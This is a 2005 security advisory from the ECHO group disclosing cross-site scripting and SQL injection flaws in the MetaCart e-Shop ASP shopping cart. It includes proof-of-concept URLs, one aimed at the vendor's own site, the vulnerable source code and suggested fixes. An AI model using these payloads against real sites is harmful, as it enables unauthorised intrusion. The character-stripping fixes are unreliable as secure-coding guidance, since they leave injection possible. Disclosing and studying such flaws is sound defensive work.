Echo Security Advisory 2005.13

`  
  
____________________ ___ ___ ________  
\_ _____/\_ ___ \ / | \\_____ \   
| __)_ / \ \// ~ \/ | \   
| \\ \___\ Y / | \  
/_______ / \______ /\___|_ /\_______ /  
\/ \/ \/ \/   
  
.OR.ID  
ECHO_ADV_13$2005  
  
---------------------------------------------------------------------------  
Multiple Vulnerabilities in MetaCart e-Shop  
---------------------------------------------------------------------------  
  
Author: Dedi Dwianto  
Date: May, 16th 2005  
Location: Indonesia, Jakarta  
Web: http://echo.or.id/adv/adv13-theday-2005.txt  
  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : MetaCart e-Shop  
version: All version of MetaCart e shop Products  
url : http://www.metalinks.com  
Author: MetaLinks Online Design  
Description:   
  
MetaCart e-Shop Is shopping cart application for small businesses  
and support ms SQL,MS Access and MySQL.  
  
---------------------------------------------------------------------------  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~  
  
A. Cross-Site Scripting (XSS)  
  
File productsByCategory.asp  
  
http://[url]/mcartlite/productsByCategory.asp?intCatalogID=1&strCatalog_NAME=<script>alert('test')</script>  
  
Problem Script productsByCategory.asp  
  
--------------  
strCatalog_name = Request.QueryString("strCatalog_NAME")  
...  
...  
strParam = Response.Write (rsCatalog("catalogID")) &strCatalog_NAME=Response.Write   
(Server.URLEncode(rsCatalog("catalogName"))) &rsCatalog("catalogName")  
  
--------------  
  
B. SQL Injection  
  
File productsByCategory.asp  
http://[url]/mcartlite/productsByCategory.asp?strSubCatalogID=2'(Sql Injection)  
  
Problem Script   
  
---------------   
intCatalogID = Request.QueryString("intCatalogID")  
...  
...  
' Build SQL String using the parameters  
strSQL = "SELECT productID,productName,productPrice FROM products WHERE catalogID = '"&strParam&"'"  
  
---------------   
  
Ex : http://www.metalinks.com/mcartlite/productsByCategory.asp?strSubCatalogID=2'having 1=1--  
Error :  
Microsoft JET Database Engine error '80040e14'   
Syntax error in string in query expression '1=1--''.   
/mcartlite/productsByCategory.asp, line 114  
  
File strCatalog_NAME  
http://[url]/mcartlite/product.asp?intProdID=1'(SQL Injection)  
  
Problem Script product.asp line 102  
  
---------------  
intProdID = Request.QueryString("intProdID")  
...  
...  
Set rsProdInfo = Conn.Execute("SELECT * FROM " & _  
"products where productID="&intProdID)  
if rsProdInfo.EOF then  
Response.Write "Product Number " & intProdID & _  
" does not exist."  
---------------  
  
C. Solution  
Using Replace String For Filter some character  
- productsByCategory.asp   
  
* Find   
intCatalogID = Request.QueryString("intCatalogID")  
After,add  
intCatalogID = Replace(intCatalogID,"'","")  
* Find  
strCatalog_name = Request.QueryString("strCatalog_NAME")  
After,add  
strCatalog_name = Replace(strCatalog_NAME,"<","")  
  
- product.asp  
  
* Find  
intProdID = Request.QueryString("intProdID")  
After,add  
intProdID = Replace(intProdID,"'","")  
  
  
  
---------------------------------------------------------------------------  
  
Shoutz:  
~~~~~~~  
  
~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous  
~ Lieur Euy , MSR  
~ [email protected] ,  
~ #e-c-h-o@DALNET  
  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
the_day || echo|staff || the_day[at]echo[dot]or[dot]id  
Homepage: http://theday.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  
`